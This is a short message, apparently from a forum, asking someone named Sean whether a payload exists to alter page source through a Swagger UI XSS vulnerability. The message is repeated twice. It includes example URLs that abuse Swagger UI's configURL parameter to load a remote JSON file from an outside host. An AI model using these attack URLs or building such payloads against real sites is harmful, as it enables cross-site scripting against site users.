Hi sean,
Sorry to bother u again. I was wondering is there any payload can allow you to change the source code by exploiting the swagger xss vulnerability.
For example:
https://vulnerability.com/content-exploration/swagger-ui/index.html?configURL=https://xss.smarpo.com/test.json

https://non-vulnerability.com/content-exploration/swagger-ui/index.html?configURL=https://xss.smarpo.com/test.json

From here you can see that the page source is pretty much the same from non-vulnerability.com and vulnerability.com.
Hi sean,
Sorry to bother u again. I was wondering is there any payload can allow you to change the source code by exploiting the swagger xss vulnerability.
For example:

https://vulnerability.com/content-exploration/swagger-ui/index.html?configURL=https://xss.smarpo.com/test.json
https://non-vulnerability.com/content-exploration/swagger-ui/index.html?configURL=https://xss.smarpo.com/test.json

From here you can see that the page source is pretty much the same from non-vulnerability.com and vulnerability.com.